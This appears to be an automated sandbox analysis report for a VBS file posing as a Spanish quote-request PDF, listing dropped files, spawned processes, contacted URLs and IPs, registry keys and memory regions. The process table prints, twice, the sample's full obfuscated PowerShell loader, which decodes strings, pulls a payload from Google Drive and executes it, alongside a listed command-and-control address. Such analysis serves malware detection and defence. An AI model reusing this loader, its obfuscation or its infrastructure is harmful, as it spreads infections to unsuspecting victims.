Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
Solicitud de presupuesto 09-30-2024#U00b7pdf.vbs
|
ASCII text, with CRLF line terminators
|
initial sample
|
 |
|
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
|
data
|
modified
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qa4clu1a.ayx.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tizitbg1.z2u.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wbnz1vi2.yk0.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xb54n4lx.fgg.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\188E93\31437F.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\188E93\31437F.lck
|
very short file (no magic)
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2246122658-3693405117-2476756634-1003\eb42b1a5c308fc11edf1ddbdd25c8486_9e146be9-c76a-4720-bcdb-53011b87bd06
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Tallowweed.Kli
|
ASCII text, with very long lines (65536), with no line terminators
|
dropped
|
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Windows\System32\wscript.exe
|
C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Solicitud de presupuesto 09-30-2024#U00b7pdf.vbs"
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Inartistical Turkisen Reenforcement #>;$Hollingsworth='Tffelheltene';<#Niveaudelen
Ufordjeligheds Initiativriges Honourarily Husbukkens #>;$Husspildevandet=$host.PrivateData;If ($Husspildevandet) {$Antoecians++;}function
Dioptres($unjoint){$Curvograph=$Repolarized+$unjoint.Length-$Antoecians;for( $Aftest=5;$Aftest -lt $Curvograph;$Aftest+=6){$Injoint+=$unjoint[$Aftest];}$Injoint;}function
Unhandled($Gaggling){ . ($Reprsenterende) ($Gaggling);}$Phoronomy=Dioptres 'nitroMInt,moBergazS,nneiU derlkommalMat iaMac.o/
star5Agend.Korpu0P rfo Sinds(La.ooWReacci SklenNringdBaandoRoun.wGrundsVirke AlpegNUnde TSnoha L,gen1Tekno0 Mass.P.rdo0Tolkd;Insuf
FertW twiniFldern Murp6 Skel4Trans;Sygem astox Fo h6Dal e4Agers;.hili Naz erProtevSu.er:Cog i1S aak2vask.1P ani. ambu0Their)sunny
ShelGRidseeUrfjecFolkekMaddio En,e/Wheel2Uncli0Ko ce1Skide0Prebl0Zo ia1Firma0benz.1A kom FimreFFahreiDecidrDrifteWind fstrudo,geerxUd.ul/bo,ca1Optra2
Li h1Bortk.Skaml0 Sejr ';$Jordskorpens=Dioptres 'Ph noUGy suS Ba eeRaggeR Beha-FlubbABlowoG Out EDuodeNApo.tTDefin ';$Patienternes=Dioptres
' osethErhvetMora.tCoccopFibrasNdlgn:Mi ti/ Elys/Sk.ggdDiu nrBag jiPre evudfale Knub.Im.ergStiloo FraaoHtt ngLegeml E ekeSolit.SparpcCreamoSalgsm
Wind/ FrdiuSi etcNavne?Kni aeIndspxSacchpEctoboSkat,rK nklt Thon=slenddObli.oChirkwCrassnLbeselGlasso B gnaTopkodEnang& ProgiUdskidPluvi=orthi1
SeizETurk 2Varmt2TankrhA rcaSTrkniDCucu.R nelif anrgLImplaSHerpeprubriLRegioTD.scihSuppomUforfHCorr,EMac r9Acco.wTyggejTajikU
erebG GorgQDyrticGiese-IntertLagomb Hist9UnvexaMymarxHjtekJArinbLInter ';$Dispowder=Dioptres 'Ruteb> Turo ';$Reprsenterende=Dioptres
'V aleIToldkE VarmXEq,al ';$bytrafik='Konfektionerings';$Peninvariant='\Tallowweed.Kli';Unhandled (Dioptres 'Pneum$Predigpe
tal onio KompbAboliaSammelConca:NatteGor.ngeriftmnStr,bd FilaiH ndsgsub etEnchae aurnengrod ybeeFishi=fae y$C ipse H frnAssumvOmb
g: Extra ignpPan rptro jd Wis a Helbt Kk,eabehnd+ onse$HoughPMiosie.ruppnSeminiSilvan RimevAffe aMyxoprSiliciGl.veaRntgenMadoqtBienn
');Unhandled (Dioptres ' ale$UrstrgSanitlS kkeo phavbScriba AnaclAmt g:EndurSBinyrtFanera FrafnI oeddNipp s Frere anadSca
ae ryde=Mu ke$ ScatPThievaHypogtflippiGoneneBerennQuadrtSetopeViridrExcavnCylineErotisUnhu . Ne bsC.rcepcorralOv rdiFo,est
Alko(pa.ro$RavinDC,regiSeps s SlidpDr,bboSpaltw ,arrdOrganeBa ysrUnder)Torch ');Unhandled (Dioptres 'Cross[FouriNHalvdeNonvat
Duk,.DemulSB,sieeMediar fllevSweetiOsmancCoe.deCe,toPLyxosoIncooiSkiffnDrg.ttNedslMAttaca BolinNonteaChondgSaussePirrerVrvle]likvi:Germa:PlejeSSa
ine PentcAar,tuSeks,rHjerniKirketA atryVarooPShamarRingroEmbrotBestsoP,ckpcSikk.oKl,mrl Slu Unad= lin f rsy[PajamNSandbeNrceitAberr.
AvisS UnquekongecFiliouForfarBes,ai Asset Sen yCoaniPForwarUlykkoBubbetenkesoK.strc KopvoIn.eslGang TTransyTha.mp Drate Stam]C
ron: Encl:Am siT,indblKonkusLadn.1shops2 Teat ');$Patienternes=$Standsede[0];$Fogydom=(Dioptres 'Mildh$FysikGDiffeL SusloWholiBMidlaaS,orsLIndis:objecDForbri,rlaaAHogowpSqua.HLuftlEI.surmChapeeAe,opTdyngerHan,ki
,fpaCBalal= SkrinGaddieTakstW Labi-Icer oHybriB herpJMorolEPenwoCE,ectTLangf VirakSFors YForb.SPreaxTPlataE Weekm Epic. BrkeNAgat,eAf,erTDivin.
uiriWSoa aE roftBOpparCLocomLTransI,okuseO sigNpast.TDenti ');Unhandled ($Fogydom);Unhandled (Dioptres 'A ago$Assesd.yrani
Pantaen.ompInninh Erine blegmOp raeHarmatAssocrNonspi,irkucviol .RegulHNbsune tabuaTr wld Flive portrDightsPisto[ T.ig$ neigJPermio
B,drr UndedTra ksSalgsk SafroBrandrM ndipdebete Anstn HekssSekon]Betnk=Cardi$Spi tP .illhTungeoRe enrIndbloC,mpunKalk.oIce
pmLestsyPreso ');$Tailwind=Dioptres ' ilde$ Upstd retriSikkeac bolp FatahSuffleSpun mStudeehoo.rtP ilor obbi ndelcAnfre.BesegDSlaveo
Bev,wse denSpejllSlagtoKundeaUniondvingeFParaliMar ylSix,eeCadav(Ligbr$PapirP Billa ienetFuldkiSemipeGarg nU.pertrom nenick
rFono.n H jseJaywasOve.b,Intra$ MeloDRterseSlimilFar,ii ImmekInimiaHjrest UndeelevnerRaphaeUdtryrPaa k) Fo b ';$Delikaterer=$Gendigtende;Unhandled
(Dioptres 'Gaunt$Cons,guncouLHummaoforunBInhalaInt.rLspros:M,ldeSforfek gav lDimenvferieElibecSTilsk= co,f(DecimT .ndbeUlvefSSagamTelvil-TetraPAfvrgAC
midt Grunh Node lave$S rikDA rime hoklPhiloiDalstKBesaaA AlbeTN ingeAgonirKonkre .nprrTypeg)Deput ');while (!$Sklves) {Unhandled
(Dioptres 'Paryk$ Indkgbattll SkatoTheribWarluaN.dstlafble: Mir Acancef PsycsTolyltAflsetBob seBardelVitiasChromeJulek=Indlg$LudvitBeklirSusp.uSo
tseAurig ') ;Unhandled $Tailwind;Unhandled (Dioptres ' PjasSMedict BltuaAnkusrinvestU bar-CamatSReplil adseeNondiePalmepAfgre
Abel4Togvo ');Unhandled (Dioptres 'Studd$ FourgNondelCrut o Ruinb Trmaa Do xlIntel:SamhaSFi,erkRem.tl HomevTripteAf ensAbonn=
Kolo(.odgaT ZabaeGasops BesttDishl-ReimbPhemola RayatN elshImp,n Rem s$brnebDSpleneCasqulP ioriHoeinkBnkbaaOba ntAntedeIntenrSkr
leAfhenrSn sc) ave ') ;Unhandled (Dioptres 'Ke.li$ Bridg PennlG,ffeoSterebInfumaThou,lBlowb:vvninEDrlu xIndtrtSociarChurcoFosf.vOmn.veKoftgrSo
set.perae.nsfodDeten=Kimri$ Anstg.inualstyfuoForstbSterca Pr,il Chef:MultiSShockaArchfmCutinv acedioverit erbet ortbiNe icgU.skrhBrandeStru,dFlngns
ilkesExtinp liter ookgLecitsep.tamRad.kaTeentaChenilKolon+Uds.e+Begle%Burmi$Me,alSlegiot F rea Samtn RelidDeerfsOvatoe UngedHelveeGenne.esotecBoa,do
BarbuSem.pnCabostfocus ') ;$Patienternes=$Standsede[$Extroverted];}$Senehinderne=336660;$Dihydrocuprin=31885;Unhandled (Dioptres
'Jabbe$BremsgKam kl LawmotelefbAabena esslCessi: Tra F eparoAll,srBe etoIrokevProleeQu,ndrkarrebCybe jp.akleSex,id rerse
N,ncsPle,r orbe=cyclo CypseGTyksteAssi tTelef-StvstCSp vvosquibnau ictSa.eleAuricnPectitender Trest$ObserDSkovgecentelkrigsiPptnhkTekstaIdealt
s mieO angrBilfreWass rHaand ');Unhandled (Dioptres ' Stal$HalshgSkyggl uebloKongub Panga leiglg.ppe:JonbySRe ittSterea Nejsm
irebkUnderoPrtenr Enc,tPhy ieStencnForeseDe mosAmtsr Armer=Vakan Plomb[CastiSGymnaySammesTry btPyrame Lovmm Land.Cau.iC UnseoForbrnWombsv
ilineBaller Eskot Vild] edbr: Indp:NedlaFRubber KopeoPo.ypm HeliBTelega Sp.esAlterePukle6Ana y4Und rSNoncotDo rirT leaiBroomnw
odsgNs et( ,ank$ProtoF ikeoOverfrAbidjoFremmvPiggeeTr nsrDairybAc orjOver eOvenldTrikieMea es Bubb),iske ');Unhandled (Dioptres
' Di p$ rogvgAn lll Bnsko F.ndbSysseaAverhlCacot:TyndeUVagtvnKabarfP rliaSubresphyl tOutfiiResy nFreelgHfter Pirri=Ambus Kvind[
KobbS Dre yPsyk s A.frtArbite allumdilec.Hol oTcircueAntilx Geort Foru.DiablEGuimpn SvvecEksh.oSnyltdTriariBacilnBaha gHavfi]
Gewg:Bakte:nul,iAunparS T.ggC ictiIDisceIOvert.helb GSklveeSkidttEsperSVilj tPiranr AvneiProv n Fre gLreri(,ynov$ hoyaS .tortEffu,acarbomTravek
rawoTapetr QuadtGringe enudnG arreSaudis Aver) Leuc ');Unhandled (Dioptres 'Acond$Hum lgTricylAlfero,entabOverpaBodysl arco:I
triCRhip.rFertiiOverhsEnt,rpValgreUbrugnF ldbi OvernCere,gIn um= Apol$PiragUStrmpn Gramf Sur,aExtrasVariat Pas iUndernEntopgMatr
.MetazsTip iuAssyrb Studs schat StrorKamtaiFiorinplaybgMet,m(Re.en$ SyedSMariteFremfn SalteUnderhgreasi AxotnFreewd ,orseA.acarOtteon
ho.eeMurd.,cec d$ForvaDTeodoiStav,hTrosiyacci dSkumprTarpioZaibacSulcauDecrepAtticrRefeeiAfst nTorta)Produ ');Unhandled $Crispening;"
|
|
|
|
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "<#Inartistical Turkisen Reenforcement #>;$Hollingsworth='Tffelheltene';<#Niveaudelen
Ufordjeligheds Initiativriges Honourarily Husbukkens #>;$Husspildevandet=$host.PrivateData;If ($Husspildevandet) {$Antoecians++;}function
Dioptres($unjoint){$Curvograph=$Repolarized+$unjoint.Length-$Antoecians;for( $Aftest=5;$Aftest -lt $Curvograph;$Aftest+=6){$Injoint+=$unjoint[$Aftest];}$Injoint;}function
Unhandled($Gaggling){ . ($Reprsenterende) ($Gaggling);}$Phoronomy=Dioptres 'nitroMInt,moBergazS,nneiU derlkommalMat iaMac.o/
star5Agend.Korpu0P rfo Sinds(La.ooWReacci SklenNringdBaandoRoun.wGrundsVirke AlpegNUnde TSnoha L,gen1Tekno0 Mass.P.rdo0Tolkd;Insuf
FertW twiniFldern Murp6 Skel4Trans;Sygem astox Fo h6Dal e4Agers;.hili Naz erProtevSu.er:Cog i1S aak2vask.1P ani. ambu0Their)sunny
ShelGRidseeUrfjecFolkekMaddio En,e/Wheel2Uncli0Ko ce1Skide0Prebl0Zo ia1Firma0benz.1A kom FimreFFahreiDecidrDrifteWind fstrudo,geerxUd.ul/bo,ca1Optra2
Li h1Bortk.Skaml0 Sejr ';$Jordskorpens=Dioptres 'Ph noUGy suS Ba eeRaggeR Beha-FlubbABlowoG Out EDuodeNApo.tTDefin ';$Patienternes=Dioptres
' osethErhvetMora.tCoccopFibrasNdlgn:Mi ti/ Elys/Sk.ggdDiu nrBag jiPre evudfale Knub.Im.ergStiloo FraaoHtt ngLegeml E ekeSolit.SparpcCreamoSalgsm
Wind/ FrdiuSi etcNavne?Kni aeIndspxSacchpEctoboSkat,rK nklt Thon=slenddObli.oChirkwCrassnLbeselGlasso B gnaTopkodEnang& ProgiUdskidPluvi=orthi1
SeizETurk 2Varmt2TankrhA rcaSTrkniDCucu.R nelif anrgLImplaSHerpeprubriLRegioTD.scihSuppomUforfHCorr,EMac r9Acco.wTyggejTajikU
erebG GorgQDyrticGiese-IntertLagomb Hist9UnvexaMymarxHjtekJArinbLInter ';$Dispowder=Dioptres 'Ruteb> Turo ';$Reprsenterende=Dioptres
'V aleIToldkE VarmXEq,al ';$bytrafik='Konfektionerings';$Peninvariant='\Tallowweed.Kli';Unhandled (Dioptres 'Pneum$Predigpe
tal onio KompbAboliaSammelConca:NatteGor.ngeriftmnStr,bd FilaiH ndsgsub etEnchae aurnengrod ybeeFishi=fae y$C ipse H frnAssumvOmb
g: Extra ignpPan rptro jd Wis a Helbt Kk,eabehnd+ onse$HoughPMiosie.ruppnSeminiSilvan RimevAffe aMyxoprSiliciGl.veaRntgenMadoqtBienn
');Unhandled (Dioptres ' ale$UrstrgSanitlS kkeo phavbScriba AnaclAmt g:EndurSBinyrtFanera FrafnI oeddNipp s Frere anadSca
ae ryde=Mu ke$ ScatPThievaHypogtflippiGoneneBerennQuadrtSetopeViridrExcavnCylineErotisUnhu . Ne bsC.rcepcorralOv rdiFo,est
Alko(pa.ro$RavinDC,regiSeps s SlidpDr,bboSpaltw ,arrdOrganeBa ysrUnder)Torch ');Unhandled (Dioptres 'Cross[FouriNHalvdeNonvat
Duk,.DemulSB,sieeMediar fllevSweetiOsmancCoe.deCe,toPLyxosoIncooiSkiffnDrg.ttNedslMAttaca BolinNonteaChondgSaussePirrerVrvle]likvi:Germa:PlejeSSa
ine PentcAar,tuSeks,rHjerniKirketA atryVarooPShamarRingroEmbrotBestsoP,ckpcSikk.oKl,mrl Slu Unad= lin f rsy[PajamNSandbeNrceitAberr.
AvisS UnquekongecFiliouForfarBes,ai Asset Sen yCoaniPForwarUlykkoBubbetenkesoK.strc KopvoIn.eslGang TTransyTha.mp Drate Stam]C
ron: Encl:Am siT,indblKonkusLadn.1shops2 Teat ');$Patienternes=$Standsede[0];$Fogydom=(Dioptres 'Mildh$FysikGDiffeL SusloWholiBMidlaaS,orsLIndis:objecDForbri,rlaaAHogowpSqua.HLuftlEI.surmChapeeAe,opTdyngerHan,ki
,fpaCBalal= SkrinGaddieTakstW Labi-Icer oHybriB herpJMorolEPenwoCE,ectTLangf VirakSFors YForb.SPreaxTPlataE Weekm Epic. BrkeNAgat,eAf,erTDivin.
uiriWSoa aE roftBOpparCLocomLTransI,okuseO sigNpast.TDenti ');Unhandled ($Fogydom);Unhandled (Dioptres 'A ago$Assesd.yrani
Pantaen.ompInninh Erine blegmOp raeHarmatAssocrNonspi,irkucviol .RegulHNbsune tabuaTr wld Flive portrDightsPisto[ T.ig$ neigJPermio
B,drr UndedTra ksSalgsk SafroBrandrM ndipdebete Anstn HekssSekon]Betnk=Cardi$Spi tP .illhTungeoRe enrIndbloC,mpunKalk.oIce
pmLestsyPreso ');$Tailwind=Dioptres ' ilde$ Upstd retriSikkeac bolp FatahSuffleSpun mStudeehoo.rtP ilor obbi ndelcAnfre.BesegDSlaveo
Bev,wse denSpejllSlagtoKundeaUniondvingeFParaliMar ylSix,eeCadav(Ligbr$PapirP Billa ienetFuldkiSemipeGarg nU.pertrom nenick
rFono.n H jseJaywasOve.b,Intra$ MeloDRterseSlimilFar,ii ImmekInimiaHjrest UndeelevnerRaphaeUdtryrPaa k) Fo b ';$Delikaterer=$Gendigtende;Unhandled
(Dioptres 'Gaunt$Cons,guncouLHummaoforunBInhalaInt.rLspros:M,ldeSforfek gav lDimenvferieElibecSTilsk= co,f(DecimT .ndbeUlvefSSagamTelvil-TetraPAfvrgAC
midt Grunh Node lave$S rikDA rime hoklPhiloiDalstKBesaaA AlbeTN ingeAgonirKonkre .nprrTypeg)Deput ');while (!$Sklves) {Unhandled
(Dioptres 'Paryk$ Indkgbattll SkatoTheribWarluaN.dstlafble: Mir Acancef PsycsTolyltAflsetBob seBardelVitiasChromeJulek=Indlg$LudvitBeklirSusp.uSo
tseAurig ') ;Unhandled $Tailwind;Unhandled (Dioptres ' PjasSMedict BltuaAnkusrinvestU bar-CamatSReplil adseeNondiePalmepAfgre
Abel4Togvo ');Unhandled (Dioptres 'Studd$ FourgNondelCrut o Ruinb Trmaa Do xlIntel:SamhaSFi,erkRem.tl HomevTripteAf ensAbonn=
Kolo(.odgaT ZabaeGasops BesttDishl-ReimbPhemola RayatN elshImp,n Rem s$brnebDSpleneCasqulP ioriHoeinkBnkbaaOba ntAntedeIntenrSkr
leAfhenrSn sc) ave ') ;Unhandled (Dioptres 'Ke.li$ Bridg PennlG,ffeoSterebInfumaThou,lBlowb:vvninEDrlu xIndtrtSociarChurcoFosf.vOmn.veKoftgrSo
set.perae.nsfodDeten=Kimri$ Anstg.inualstyfuoForstbSterca Pr,il Chef:MultiSShockaArchfmCutinv acedioverit erbet ortbiNe icgU.skrhBrandeStru,dFlngns
ilkesExtinp liter ookgLecitsep.tamRad.kaTeentaChenilKolon+Uds.e+Begle%Burmi$Me,alSlegiot F rea Samtn RelidDeerfsOvatoe UngedHelveeGenne.esotecBoa,do
BarbuSem.pnCabostfocus ') ;$Patienternes=$Standsede[$Extroverted];}$Senehinderne=336660;$Dihydrocuprin=31885;Unhandled (Dioptres
'Jabbe$BremsgKam kl LawmotelefbAabena esslCessi: Tra F eparoAll,srBe etoIrokevProleeQu,ndrkarrebCybe jp.akleSex,id rerse
N,ncsPle,r orbe=cyclo CypseGTyksteAssi tTelef-StvstCSp vvosquibnau ictSa.eleAuricnPectitender Trest$ObserDSkovgecentelkrigsiPptnhkTekstaIdealt
s mieO angrBilfreWass rHaand ');Unhandled (Dioptres ' Stal$HalshgSkyggl uebloKongub Panga leiglg.ppe:JonbySRe ittSterea Nejsm
irebkUnderoPrtenr Enc,tPhy ieStencnForeseDe mosAmtsr Armer=Vakan Plomb[CastiSGymnaySammesTry btPyrame Lovmm Land.Cau.iC UnseoForbrnWombsv
ilineBaller Eskot Vild] edbr: Indp:NedlaFRubber KopeoPo.ypm HeliBTelega Sp.esAlterePukle6Ana y4Und rSNoncotDo rirT leaiBroomnw
odsgNs et( ,ank$ProtoF ikeoOverfrAbidjoFremmvPiggeeTr nsrDairybAc orjOver eOvenldTrikieMea es Bubb),iske ');Unhandled (Dioptres
' Di p$ rogvgAn lll Bnsko F.ndbSysseaAverhlCacot:TyndeUVagtvnKabarfP rliaSubresphyl tOutfiiResy nFreelgHfter Pirri=Ambus Kvind[
KobbS Dre yPsyk s A.frtArbite allumdilec.Hol oTcircueAntilx Geort Foru.DiablEGuimpn SvvecEksh.oSnyltdTriariBacilnBaha gHavfi]
Gewg:Bakte:nul,iAunparS T.ggC ictiIDisceIOvert.helb GSklveeSkidttEsperSVilj tPiranr AvneiProv n Fre gLreri(,ynov$ hoyaS .tortEffu,acarbomTravek
rawoTapetr QuadtGringe enudnG arreSaudis Aver) Leuc ');Unhandled (Dioptres 'Acond$Hum lgTricylAlfero,entabOverpaBodysl arco:I
triCRhip.rFertiiOverhsEnt,rpValgreUbrugnF ldbi OvernCere,gIn um= Apol$PiragUStrmpn Gramf Sur,aExtrasVariat Pas iUndernEntopgMatr
.MetazsTip iuAssyrb Studs schat StrorKamtaiFiorinplaybgMet,m(Re.en$ SyedSMariteFremfn SalteUnderhgreasi AxotnFreewd ,orseA.acarOtteon
ho.eeMurd.,cec d$ForvaDTeodoiStav,hTrosiyacci dSkumprTarpioZaibacSulcauDecrepAtticrRefeeiAfst nTorta)Produ ');Unhandled $Crispening;"
|
|
|
|
C:\Windows\SysWOW64\dxdiag.exe
|
"C:\Windows\syswow64\dxdiag.exe"
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\SysWOW64\msiexec.exe
|
"C:\Windows\syswow64\msiexec.exe"
|
||
|
C:\Windows\SysWOW64\msiexec.exe
|
"C:\Windows\syswow64\msiexec.exe"
|
||
|
C:\Windows\SysWOW64\msiexec.exe
|
"C:\Windows\syswow64\msiexec.exe"
|
||
|
C:\Windows\SysWOW64\msiexec.exe
|
"C:\Windows\syswow64\msiexec.exe"
|
||
|
C:\Windows\SysWOW64\msiexec.exe
|
"C:\Windows\syswow64\msiexec.exe"
|
||
|
C:\Windows\SysWOW64\msiexec.exe
|
"C:\Windows\syswow64\msiexec.exe"
|
||
|
C:\Windows\SysWOW64\msiexec.exe
|
"C:\Windows\syswow64\msiexec.exe"
|
||
|
C:\Windows\SysWOW64\msiexec.exe
|
"C:\Windows\syswow64\msiexec.exe"
|
||
|
C:\Windows\SysWOW64\msiexec.exe
|
"C:\Windows\syswow64\msiexec.exe"
|
||
|
C:\Windows\SysWOW64\msiexec.exe
|
"C:\Windows\syswow64\msiexec.exe"
|
||
|
C:\Windows\SysWOW64\msiexec.exe
|
"C:\Windows\syswow64\msiexec.exe"
|
There are 7 hidden processes, click here to show them.
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
http://137.184.191.215/index.php/10899
|
137.184.191.215
|
|
|
|
http://137.184.191.215/index.php/10899x
|
unknown
|
||
|
http://nuget.org/NuGet.exe
|
unknown
|
||
|
http://drive.usercontent.google.com
|
unknown
|
||
|
http://pesterbdd.com/images/Pester.png
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
|
https://go.micro
|
unknown
|
||
|
https://contoso.com/License
|
unknown
|
||
|
https://contoso.com/Icon
|
unknown
|
||
|
https://drive.googP
|
unknown
|
||
|
https://wordpress.org/documentation/article/faq-troubleshooting/
|
unknown
|
||
|
https://drive.usercontent.google.com/
|
unknown
|
||
|
http://drive.google.com
|
unknown
|
||
|
https://github.com/Pester/Pester
|
unknown
|
||
|
https://www.google.com
|
unknown
|
||
|
https://drive.usercontent.googh(
|
unknown
|
||
|
https://aka.ms/pscore6lB
|
unknown
|
||
|
https://drive.google.com/
|
unknown
|
||
|
https://contoso.com/
|
unknown
|
||
|
https://nuget.org/nuget.exe
|
unknown
|
||
|
https://drive.google.com
|
unknown
|
||
|
https://drive.usercontent.google.com
|
unknown
|
||
|
https://aka.ms/pscore68
|
unknown
|
||
|
https://apis.google.com
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
|
http://w7icrosoft.com
|
unknown
|
||
|
https://drive.google
|
unknown
|
There are 17 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
drive.google.com
|
142.250.185.142
|
||
|
drive.usercontent.google.com
|
142.250.181.225
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
137.184.191.215
|
unknown
|
United States
|
|
|
|
142.250.181.225
|
drive.usercontent.google.com
|
United States
|
||
|
142.250.185.142
|
drive.google.com
|
United States
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
||
|
HKEY_CURRENT_USER\????????????????????????????????????
|
188E93
|
There are 5 hidden registries, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
5A7F000
|
trusted library allocation
|
page read and write
|
|
|
|
1AB72CA4000
|
trusted library allocation
|
page read and write
|
|
|
|
9A96000
|
direct allocation
|
page execute and read and write
|
|
|
|
8860000
|
direct allocation
|
page execute and read and write
|
|
|
|
8210000
|
trusted library allocation
|
page execute and read and write
|
||
|
1AB60FC6000
|
heap
|
page read and write
|
||
|
6E40000
|
direct allocation
|
page read and write
|
||
|
22680000
|
direct allocation
|
page read and write
|
||
|
1AB7B020000
|
heap
|
page execute and read and write
|
||
|
2C70000
|
heap
|
page read and write
|
||
|
7FFB1E3C2000
|
unkown
|
page readonly
|
||
|
1C35FD7A000
|
heap
|
page read and write
|
||
|
6C45000
|
heap
|
page execute and read and write
|
||
|
22EB0000
|
direct allocation
|
page read and write
|
||
|
820E000
|
stack
|
page read and write
|
||
|
1C35FD6C000
|
heap
|
page read and write
|
||
|
2E80000
|
heap
|
page read and write
|
||
|
1C35FD6C000
|
heap
|
page read and write
|
||
|
1C361AAE000
|
heap
|
page read and write
|
||
|
1C361AF7000
|
heap
|
page read and write
|
||
|
7FFAAC43A000
|
trusted library allocation
|
page read and write
|
||
|
1AB648E3000
|
trusted library allocation
|
page read and write
|
||
|
46E0000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC420000
|
trusted library allocation
|
page read and write
|
||
|
1AB64A3B000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC540000
|
trusted library allocation
|
page read and write
|
||
|
1C35FBE0000
|
heap
|
page read and write
|
||
|
7FFB1E3C0000
|
unkown
|
page read and write
|
||
|
226A0000
|
direct allocation
|
page read and write
|
||
|
4700000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC510000
|
trusted library allocation
|
page read and write
|
||
|
6E80000
|
direct allocation
|
page read and write
|
||
|
868000
|
stack
|
page read and write
|
||
|
7700000
|
trusted library allocation
|
page read and write
|
||
|
2930000
|
heap
|
page read and write
|
||
|
7350000
|
trusted library allocation
|
page read and write
|
||
|
73CE6000
|
unkown
|
page readonly
|
||
|
22DA0000
|
remote allocation
|
page read and write
|
||
|
1AB7B030000
|
heap
|
page read and write
|
||
|
22D3F000
|
stack
|
page read and write
|
||
|
1C361BEF000
|
heap
|
page read and write
|
||
|
1C361ABA000
|
heap
|
page read and write
|
||
|
A496000
|
direct allocation
|
page execute and read and write
|
||
|
4710000
|
trusted library allocation
|
page read and write
|
||
|
7660000
|
heap
|
page readonly
|
||
|
1C35FD81000
|
heap
|
page read and write
|
||
|
1AB62C20000
|
heap
|
page read and write
|
||
|
773A000
|
heap
|
page read and write
|
||
|
7FFB1E3B6000
|
unkown
|
page readonly
|
||
|
1C35FD6C000
|
heap
|
page read and write
|
||
|
7FFAAC284000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC290000
|
trusted library allocation
|
page read and write
|
||
|
845A000
|
heap
|
page read and write
|
||
|
7FFAAC336000
|
trusted library allocation
|
page read and write
|
||
|
1AB7B2FA000
|
heap
|
page read and write
|
||
|
1AB64923000
|
trusted library allocation
|
page read and write
|
||
|
3FEC35A000
|
stack
|
page read and write
|
||
|
1C361A91000
|
heap
|
page read and write
|
||
|
8290000
|
trusted library allocation
|
page read and write
|
||
|
8413000
|
heap
|
page read and write
|
||
|
22E6C000
|
stack
|
page read and write
|
||
|
22B6D000
|
stack
|
page read and write
|
||
|
485C000
|
stack
|
page read and write
|
||
|
7FFB1E3A0000
|
unkown
|
page readonly
|
